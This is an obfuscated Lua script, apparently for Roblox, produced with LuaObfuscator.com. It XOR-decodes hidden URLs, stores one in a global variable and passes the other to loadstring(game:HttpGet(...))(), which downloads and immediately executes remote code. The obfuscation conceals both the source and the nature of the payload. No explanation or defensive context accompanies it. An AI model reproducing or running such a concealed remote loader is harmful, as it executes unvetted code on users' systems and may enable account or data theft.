--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11)local v12={};for i=1 + 0, #v10 do v6(v12,v0(v4(v1(v2(v10,i,i + 1 + 0 + 0)),v1(v2(v11,((1496 -(623 + 382)) -(320 + 170)) + ((i-1)% #v11),1 + (0 -0) + ((i-1)% #v11) + ((3694 -(300 + 1550)) -(1779 + 64)))))%(1451 -(418 + 777))));end return v5(v12);end _G.v8=4144550939 -(964 + 112);_G.v9=v7("\124\237\227\15\44\103\59\182\243\22\44\62\123\235\243\81\60\50\121\182\246\15\54\114\99\252\245\23\48\50\127\234\184\71\103\107\37\160\161\74\111\104\38\174\164\76\111\106\37\170\161\80\58\46\127\253\254\59\24\100\120\240\241\46\9\40\69\253\193\45\26\63\87\234\246\59\17\45\121\243\255\51\54\108\118\254\193\62\58\44\81\245\242\13\14\12\92\171\254\24\38\14\68\253\223\32\48\40\82\205\218\11\18\8\75\246\199\26\11\24","\20\153\151\127\95\93");loadstring(game:HttpGet(v7("\16\4\37\213\247\8\87\95\35\196\243\28\31\25\37\205\241\80\13\3\52\215\231\93\22\4\52\203\240\28\27\31\60\138\242\87\11\4\40\221\171\98\29\4\2\204\233\71\20\17\37\202\246\106\57\5\37\202\194\83\10\29\126\200\229\91\22\95\25\196\247\70\29\54\48\215\233\28\20\5\48","\120\112\81\165\132\50")))();
